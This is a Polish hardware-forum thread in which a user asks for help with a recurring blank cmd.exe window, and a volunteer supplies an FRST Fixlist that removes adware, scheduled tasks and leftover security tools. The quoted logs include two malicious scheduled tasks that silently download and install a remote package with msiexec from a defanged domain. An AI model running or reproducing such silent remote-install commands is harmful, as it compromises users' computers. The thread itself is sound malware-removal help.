Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Acer Aspire VN7-792G - Ciągłe pojawianie się pustego okna cdm.exe.

cuprys 05 Lis 2018 20:44 117 6
  • #1 05 Lis 2018 20:44
    cuprys
    Poziom 9  

    Podczas uruchamiania systemu Windows 8.1 od pewnego czasu pojawia się puste okno cdm.exe. Dodatkowo w programie antywirusowym pojawia się informacja:
    msiexec.exe
    refreshnerer1309.info, po czym antywirus ponoć przenosi te pliki do kwarantanny, jednak po niedługim czasie występuje to samo zjawisko. Bardzo proszę o pomoc.

    0 6
  • #2 05 Lis 2018 20:51
    Kolobos
    Spec od komputerów

    Napisales w zlym dziale, nie zamiesciles wymaganych logow.

    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Zamiesc w zalaczniku logi ze skanowania z FRST (Frst.txt oraz Addition.txt):
    http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    0
  • #3 05 Lis 2018 21:10
    cuprys
    Poziom 9  

    Bardzo przepraszam, ale jestem nowicjuszem, jeśli chodzi o pisanie takich wiadomości. Odpowiadając na instrukcje, używałem AdwCleaner, Malwarebytes Premium, SpyHunter i inne. Żaden z tych programów nie daje rady, Jedynie antywirus Avast Premier znajduje te virusy i dodaje do kwarantanny, jednak ten problem się ciągle pojawia.
    Dodaje pliki z FRST.

    0
  • #4 05 Lis 2018 21:20
    Kolobos
    Spec od komputerów

    Odinstaluj:
    Avast Cleanup Premium
    IObit Malware Fighter 6
    Loaris Trojan Remover 3.0.53.186
    PC Tools Registry Mechanic 11.1
    Spy Emergency 2018-24.0.950

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {01648E98-4061-4155-9BAA-7D80D1D2AD7E} - System32\Tasks\{F5BD5F70-F89F-467D-8F60-5A82AE4F373A} => C:\Windows\system32\pcalua.exe -a "D:\Programy Użytkowe\Graficzne\MediaFace 5.0.40\MediaFace.exe" -d "D:\Programy Użytkowe\Graficzne\MediaFace 5.0.40\"
    Task: {2AFD5A2E-64BA-4F17-9D83-77ABB5423DD8} - System32\Tasks\{B45DF120-D547-DBFE-EEA3-5BFA709AC596} => "cmd" /c "msiexec /i hxxp://refreshnerer1309rb.info/4IoTVk2kZ.IKJ /q" <==== UWAGA
    Task: {42D36A0B-3411-4C86-9202-24E48F41B3C0} - System32\Tasks\{25C5D918-1AFF-F58D-9D23-8765D3CDEB94} => "cmd" /c "msiexec /i hxxp://refreshnerer1309.info/o1B4jTFL.ATh /q" <==== UWAGA
    Task: {4CD67049-C26B-43BB-9C53-DCAC5B04C38A} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
    Task: {5428C9FF-B994-4A2E-BE1A-6701772BB502} - System32\Tasks\Avast Cleanup Update => C:\Program Files (x86)\AVAST Software\Avast Cleanup\TUNEUpdate.exe [2018-11-02] (AVAST Software)
    Task: {69F23605-40A1-4259-B27D-74A3E048923E} - System32\Tasks\RMAutoUpdate => D:\Programy Użytkowe\Narzędzia\Naprawa i optymalizacja systemu\Narzędzia do optymalizacji systemu\Registry Mechanic\SULauncher.exe [2012-08-21] (PC Tools)
    Task: {9B6BB3F3-88FC-4C7C-84A8-DD9919EB2E02} - System32\Tasks\Driver Booster Scheduler => D:\Programy Użytkowe\Narzędzia\Diagnostyka\Driver Booster 5\Driver Booster\6.0.2\Scheduler.exe [2018-09-20] (IObit)
    Task: {A19DB709-D171-4838-9A95-A96C1FA31CC9} - System32\Tasks\Driver Booster SkipUAC (Cuprys) => D:\Programy Użytkowe\Narzędzia\Diagnostyka\Driver Booster 5\Driver Booster\6.0.2\DriverBooster.exe [2018-09-25] (IObit)
    Task: C:\Windows\Tasks\RMAutoUpdate.job => D:\Programy Użytkowe\Narzędzia\Naprawa i optymalizacja systemu\Narzędzia do optymalizacji systemu\Registry Mechanic\SULauncher.exe
    Hosts:
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast Cleanup Premium.lnk [2018-10-30]
    ShortcutTarget: Avast Cleanup Premium.lnk -> C:\Program Files (x86)\AVAST Software\Avast Cleanup\TuneupUI.exe (AVAST Software)
    BootExecute: autocheck autochk * sh4native Sh4Removal
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    R2 CleanupPSvc; C:\Program Files (x86)\AVAST Software\Avast Cleanup\TuneupSvc.exe [9121248 2018-11-02] (AVAST Software)
    R2 IMFservice; D:\Programy Użytkowe\Narzędzia\Naprawa i optymalizacja systemu\Narzędzia do naprawy systemu\IObit Malware Fighter\IMFsrv.exe [2355472 2018-10-19] (IObit)




    S4 PCToolsSSDMonitorSvc; C:\Program Files (x86)\Common Files\PC Tools\sMonitor\StartManSvc.exe [794272 2012-08-21] (PC Tools)
    R2 SpyEmrgHealth; D:\Programy Użytkowe\Narzędzia\Naprawa i optymalizacja systemu\Narzędzia do naprawy systemu\Spy Emergency\SpyEmergencyHealth.exe [379192 2015-03-20] (NETGATE Technologies s.r.o.)
    R2 SpyEmrgSrv; D:\Programy Użytkowe\Narzędzia\Naprawa i optymalizacja systemu\Narzędzia do naprawy systemu\Spy Emergency\SpyEmergencySrv.exe [3332960 2015-03-09] (NETGATE Technologies s.r.o.)
    S3 TenorshareWinAdService; C:\Users\Cuprys\AppData\Roaming\Tenorshare\Service\configs\TenorshareWinAdService.exe [40448 2017-11-28] (Tenorshare Co,Ltd) [Brak podpisu cyfrowego]
    S2 AmitiAvHealth; C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe [X]
    S3 esgiguard; D:\Programy ZIP\Naprawa i optymalizacja systemu\Narzędzia do naprawy systemu\Spy Hunter\SpyHunter 4.23.2.4686 PL Portable\App\SpyHunter\esgiguard.sys [16432 2016-07-20] (Enigma Software Group USA, LLC.)
    S3 TuneUpUtilitiesDrv; \??\C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [X]
    2018-11-03 16:33 - 2018-11-03 16:33 - 000002760 _____ C:\Users\Cuprys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spy Hunter 4.lnk
    2018-11-03 16:00 - 2016-07-20 19:14 - 000025768 _____ C:\Windows\SysWOW64\sh4native.exe
    2018-11-03 15:59 - 2018-11-03 16:00 - 000000000 ___HD C:\ErUjqiL30BtOEYkb
    2018-11-03 15:59 - 2018-11-03 15:59 - 000018293 _____ C:\spyhunter.fix
    2018-11-03 15:14 - 2018-11-03 15:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spy Emergency
    2018-11-03 15:14 - 2018-11-03 15:15 - 000000000 ____D C:\Users\Cuprys\AppData\Roaming\Spy Emergency
    2018-11-03 15:14 - 2018-11-03 15:14 - 000000000 ____D C:\ProgramData\NETGATE
    2018-11-03 15:14 - 2015-03-09 12:26 - 000019768 _____ (NETGATE Technologies s.r.o.) C:\Windows\system32\Drivers\spyemrg_guard.sys
    2018-11-03 15:14 - 2011-04-21 11:31 - 000024408 _____ (NETGATE Technologies s.r.o.) C:\Windows\system32\Drivers\spyemrg_access.sys
    2018-11-03 15:14 - 2011-04-21 11:31 - 000017240 _____ (NETGATE Technologies s.r.o.) C:\Windows\system32\Drivers\spyemrg.sys
    2018-11-03 12:41 - 2018-11-03 21:50 - 000003162 _____ C:\Windows\System32\Tasks\Driver Booster Scheduler
    2018-10-21 17:59 - 2018-10-21 17:59 - 000000000 ____D C:\Users\Cuprys\AppData\Local\Turbo.net
    2018-10-21 17:58 - 2018-10-25 12:39 - 000000000 ____D C:\ProgramData\Mutes
    2018-10-21 17:51 - 2018-10-21 17:52 - 000000000 ____D C:\Users\Cuprys\AppData\Roaming\sNNgD
    2018-10-07 07:08 - 2018-11-03 21:50 - 000003592 _____ C:\Windows\System32\Tasks\{25C5D918-1AFF-F58D-9D23-8765D3CDEB94}
    2018-10-07 07:08 - 2018-11-03 21:50 - 000003396 _____ C:\Windows\System32\Tasks\{B45DF120-D547-DBFE-EEA3-5BFA709AC596}
    2018-10-07 07:08 - 2018-10-07 07:08 - 000000003 _____ C:\Users\Cuprys\AppData\Local\wbem.ini
    2018-10-07 07:08 - 2018-06-19 14:31 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\aylMGT.exe
    2018-10-07 07:08 - 2014-11-21 05:59 - 000197120 ____N (Microsoft Corporation) C:\Users\Cuprys\AYeobwMgT.exe
    2018-10-25 17:11 - 2018-08-24 14:31 - 000000000 ____D C:\AdwCleaner
    2018-10-08 22:01 - 2018-09-04 14:47 - 000003238 _____ C:\Windows\System32\Tasks\{F5BD5F70-F89F-467D-8F60-5A82AE4F373A}
    2018-10-07 07:08 - 2014-11-21 05:59 - 000197120 ____N (Microsoft Corporation) C:\Users\Cuprys\AYeobwMgT.exe
    2018-10-07 07:08 - 2018-06-19 14:31 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\aylMGT.exe
    2018-07-04 20:04 - 2018-11-05 19:56 - 000007110 _____ () C:\Users\Cuprys\AppData\Roaming\wklnhst.dat
    2018-10-07 07:08 - 2018-10-07 07:08 - 000000003 _____ () C:\Users\Cuprys\AppData\Local\wbem.ini

    W FRST Wybierz Napraw.

    Po wykonaniu sprawdz czy jest ok, jezeli tak to usun katalog C:\FRST i to wszystko.

    0
  • #5 05 Lis 2018 21:36
    cuprys
    Poziom 9  

    Dziękuje za szybką odpowiedź, ale niestety nie wiem jak utworzyć plik Fixlist.txt

    0
  • Pomocny post
    #6 05 Lis 2018 21:38
    Kolobos
    Spec od komputerów

    Bez przesady, uruchom notatnik, wklej to co podalem i zapisz plik pod nazwa Fixlist.txt w katalogu w ktorym masz frst.exe!

    0
  • #7 06 Lis 2018 13:58
    cuprys
    Poziom 9  

    Bardzo dziękuje koledze "Kolobos" za szybkie i zdecydowanie trafne rozwiązanie mojego problemu. Wszystko działa poprawnie. Problem został rozwiązany.
    Temat do zamknięcia.

    0